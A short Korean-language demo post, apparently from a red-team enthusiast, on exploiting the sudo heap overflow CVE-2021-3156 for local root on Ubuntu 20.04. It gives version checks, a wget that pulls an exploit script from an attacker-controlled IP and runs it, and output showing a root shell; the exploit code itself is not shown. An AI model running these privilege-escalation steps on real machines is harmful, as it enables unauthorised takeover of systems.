
CVE-2021-3156-Exploit-Demo
📅 날짜: 2025-06-08
✍️ 작성자: @TopskiyPavelQwertyGang
🧠 보안 연구원 | 레드팀 애호가
sudoedit (sudo)sudoedit의 힙 오버플로우로 인해 로컬 사용자가 미리 준비된 매개변수로 sudoedit 명령을 실행할 때 루트 액세스 권한을 얻을 수 있습니다.
이 취약점은 sudo < 1.9.5p2 버전에서 활성화되며, 인기 있는 Ubuntu/Debian/CentOS 이미지를 포함합니다. ASLR이 활성화된 경우에도 여전히 악용 가능합니다.
OS : Ubuntu 20.04.3 LTS
glibc : 2.31 (tcache ON)
sudo : 1.8.31 (유약함)
ASLR : 2 (활성화)
glibc 및 sudo 버전 확인:ldd --version
sudo --version
python3 -m http.server 80
wget http://<IP>:80/exploit_nss.py
python3 exploit_nss.py
$ python3 exploit_nss.py
# whoami
root
CVE-2021-3156 악용은 glibc ≥ 2.26이고 sudo가 취약한 버전인 경우 ASLR이 활성화된 상태에서도 가능합니다. 가장 안정적인 익스플로잇은 올바른 NSS 구성에서 첫 번째 시도에 성공하는 exploit_nss.py입니다.
🧨 시스템이 제어되었습니다.